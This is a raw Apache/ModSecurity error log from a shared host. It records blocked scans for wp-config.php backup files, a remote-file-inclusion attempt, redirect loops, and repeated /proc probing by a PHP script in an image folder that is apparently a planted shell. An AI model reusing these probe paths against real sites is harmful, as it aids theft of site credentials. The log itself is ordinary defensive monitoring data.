[Tue May 12 04:55:02.791323 2026] [security2:error] [pid 1825179:tid 1825217] [client 172.212.217.10:21513] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.php.backup"] [unique_id "agKWhtr1yOh9TvizeziUAgAAAFM"]
[Tue May 12 04:55:02.791489 2026] [security2:error] [pid 1825179:tid 1825217] [client 172.212.217.10:21513] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.php.backup"] [unique_id "agKWhtr1yOh9TvizeziUAgAAAFM"]
[Tue May 12 04:55:02.791728 2026] [security2:error] [pid 1825179:tid 1825217] [client 172.212.217.10:21513] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agKWhtr1yOh9TvizeziUAgAAAFM"]
[Tue May 12 04:55:37.019811 2026] [:error] [pid 1730207:tid 1730224] [client 74.7.243.217:43302] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705476/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705476/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705476/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705476/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705476/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705476/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:56:22.125581 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.212.217.10:33945] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/backup.wp-config.php"] [unique_id "agKW1no6NvB9WXx5V-6jFQAAAQM"]
[Tue May 12 04:56:22.125736 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.212.217.10:33945] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/backup.wp-config.php"] [unique_id "agKW1no6NvB9WXx5V-6jFQAAAQM"]
[Tue May 12 04:56:22.125943 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.212.217.10:33945] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agKW1no6NvB9WXx5V-6jFQAAAQM"]
[Tue May 12 04:56:42.504079 2026] [:error] [pid 1730207:tid 1730224] [client 74.7.243.217:48310] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:56:44.346472 2026] [security2:error] [pid 1808852:tid 1808867] [client 43.156.125.227:35958] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKW7BfeipD4uoG21FomygAAAAw"]
PHP Warning:  filesize(): stat failed for /proc/63/task/63/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/63/task/63/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/63/task/63/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/63/task/63/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/63/task/63/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/63/task/63/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:57:21.725761 2026] [security2:error] [pid 1730207:tid 1730220] [client 43.130.40.120:56352] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agKXETue9Sp-pIv_Bb65RAAAAUs"]
PHP Warning:  filesize(): stat failed for /proc/855/task/855/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/855/task/855/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/855/task/855/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/855/task/855/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/855/task/855/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/855/task/855/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:57:45.134076 2026] [:error] [pid 1730175:tid 1730180] [client 74.7.243.217:43118] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:57:50.902928 2026] [security2:error] [pid 1730207:tid 1730220] [client 43.155.27.244:36518] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2026/01/Roue-Libre-extrait-site-3.mp3"] [unique_id "agKXLjue9Sp-pIv_Bb65WwAAAUs"]
[Tue May 12 04:57:51.489367 2026] [security2:error] [pid 1808852:tid 1808872] [client 54.164.106.236:63161] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://209.132.201.117 found within ARGS:url: http://209.132.201.117/pages/New/soon.html"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKXLxfeipD4uoG21Fom_AAAABE"]
[Tue May 12 04:57:51.489863 2026] [security2:error] [pid 1808852:tid 1808872] [client 54.164.106.236:63161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKXLxfeipD4uoG21Fom_AAAABE"]
[Tue May 12 04:57:51.490355 2026] [security2:error] [pid 1808852:tid 1808872] [client 54.164.106.236:63161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKXLxfeipD4uoG21Fom_AAAABE"]
PHP Warning:  filesize(): stat failed for /proc/68/task/68/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/68/task/68/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/68/task/68/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/68/task/68/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/68/task/68/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/68/task/68/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:57:58.798712 2026] [security2:error] [pid 1730175:tid 1730186] [client 172.212.217.10:33737] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/new-wp-config.php"] [unique_id "agKXNno6NvB9WXx5V-6jbQAAAQk"]
[Tue May 12 04:57:58.798860 2026] [security2:error] [pid 1730175:tid 1730186] [client 172.212.217.10:33737] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/new-wp-config.php"] [unique_id "agKXNno6NvB9WXx5V-6jbQAAAQk"]
[Tue May 12 04:57:58.799085 2026] [security2:error] [pid 1730175:tid 1730186] [client 172.212.217.10:33737] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agKXNno6NvB9WXx5V-6jbQAAAQk"]
[Tue May 12 04:58:04.276214 2026] [:error] [pid 1825287:tid 1825330] [client 46.151.178.13:52876] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Tue May 12 04:58:39.411483 2026] [security2:error] [pid 1820198:tid 1820207] [client 43.166.134.47:59674] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "piregwan-genesis.com"] [uri "/"] [unique_id "agKXX81tk6y7yBJLpJovXgAAAIc"], referer: http://piregwan-genesis.com
[Tue May 12 04:59:18.810795 2026] [core:error] [pid 1820198:tid 1820204] [client 13.75.199.23:7493] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:18.810822 2026] [core:error] [pid 1820198:tid 1820204] [client 13.75.199.23:7493] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:19.569240 2026] [core:error] [pid 1730207:tid 1730229] [client 13.75.199.23:3849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:19.569269 2026] [core:error] [pid 1730207:tid 1730229] [client 13.75.199.23:3849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:20.367603 2026] [core:error] [pid 1730207:tid 1730223] [client 13.75.199.23:7498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:20.367635 2026] [core:error] [pid 1730207:tid 1730223] [client 13.75.199.23:7498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:21.192552 2026] [core:error] [pid 1825287:tid 1825316] [client 13.75.199.23:3853] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:21.192586 2026] [core:error] [pid 1825287:tid 1825316] [client 13.75.199.23:3853] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:22.002408 2026] [core:error] [pid 1820198:tid 1820205] [client 13.75.199.23:3482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:22.002446 2026] [core:error] [pid 1820198:tid 1820205] [client 13.75.199.23:3482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:22.769350 2026] [core:error] [pid 1825179:tid 1825214] [client 13.75.199.23:3505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:22.769380 2026] [core:error] [pid 1825179:tid 1825214] [client 13.75.199.23:3505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:23.570344 2026] [core:error] [pid 1808852:tid 1808862] [client 13.75.199.23:3858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:23.570373 2026] [core:error] [pid 1808852:tid 1808862] [client 13.75.199.23:3858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:24.377988 2026] [core:error] [pid 1820198:tid 1820202] [client 13.75.199.23:3492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:24.378016 2026] [core:error] [pid 1820198:tid 1820202] [client 13.75.199.23:3492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:26.037297 2026] [core:error] [pid 1825287:tid 1825327] [client 13.75.199.23:8057] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:26.037324 2026] [core:error] [pid 1825287:tid 1825327] [client 13.75.199.23:8057] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:26.813243 2026] [core:error] [pid 1730207:tid 1730211] [client 13.75.199.23:9232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:26.813277 2026] [core:error] [pid 1730207:tid 1730211] [client 13.75.199.23:9232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:27.607217 2026] [core:error] [pid 1730175:tid 1730200] [client 13.75.199.23:3868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:27.607247 2026] [core:error] [pid 1730175:tid 1730200] [client 13.75.199.23:3868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:28.452740 2026] [core:error] [pid 1825179:tid 1825218] [client 13.75.199.23:8005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:28.452783 2026] [core:error] [pid 1825179:tid 1825218] [client 13.75.199.23:8005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:29.247299 2026] [core:error] [pid 1820198:tid 1820220] [client 13.75.199.23:8040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:29.247330 2026] [core:error] [pid 1820198:tid 1820220] [client 13.75.199.23:8040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:30.039752 2026] [core:error] [pid 1825287:tid 1825328] [client 13.75.199.23:8035] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:30.039781 2026] [core:error] [pid 1825287:tid 1825328] [client 13.75.199.23:8035] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:30.815849 2026] [core:error] [pid 1808852:tid 1808874] [client 13.75.199.23:9641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:30.815877 2026] [core:error] [pid 1808852:tid 1808874] [client 13.75.199.23:9641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:31.581198 2026] [core:error] [pid 1825179:tid 1825220] [client 13.75.199.23:3463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:31.581236 2026] [core:error] [pid 1825179:tid 1825220] [client 13.75.199.23:3463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:32.400213 2026] [core:error] [pid 1825287:tid 1825311] [client 13.75.199.23:9233] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:32.400242 2026] [core:error] [pid 1825287:tid 1825311] [client 13.75.199.23:9233] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:33.058078 2026] [security2:error] [pid 1730207:tid 1730210] [client 43.134.33.236:44346] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/uploads/2019/08/BelladoneOutline.ttf_.zip"] [unique_id "agKXlTue9Sp-pIv_Bb65wAAAAUE"]
[Tue May 12 04:59:33.217486 2026] [core:error] [pid 1825287:tid 1825322] [client 13.75.199.23:3459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:33.217515 2026] [core:error] [pid 1825287:tid 1825322] [client 13.75.199.23:3459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:34.055423 2026] [core:error] [pid 1825179:tid 1825203] [client 13.75.199.23:8014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:34.055450 2026] [core:error] [pid 1825179:tid 1825203] [client 13.75.199.23:8014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:34.831498 2026] [core:error] [pid 1825287:tid 1825314] [client 13.75.199.23:9638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:34.831532 2026] [core:error] [pid 1825287:tid 1825314] [client 13.75.199.23:9638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:35.626744 2026] [core:error] [pid 1808852:tid 1808869] [client 13.75.199.23:9255] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:35.626772 2026] [core:error] [pid 1808852:tid 1808869] [client 13.75.199.23:9255] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:36.426814 2026] [core:error] [pid 1820198:tid 1820218] [client 13.75.199.23:9643] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:36.426842 2026] [core:error] [pid 1820198:tid 1820218] [client 13.75.199.23:9643] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:37.235974 2026] [core:error] [pid 1730207:tid 1730232] [client 13.75.199.23:3998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:37.236006 2026] [core:error] [pid 1730207:tid 1730232] [client 13.75.199.23:3998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
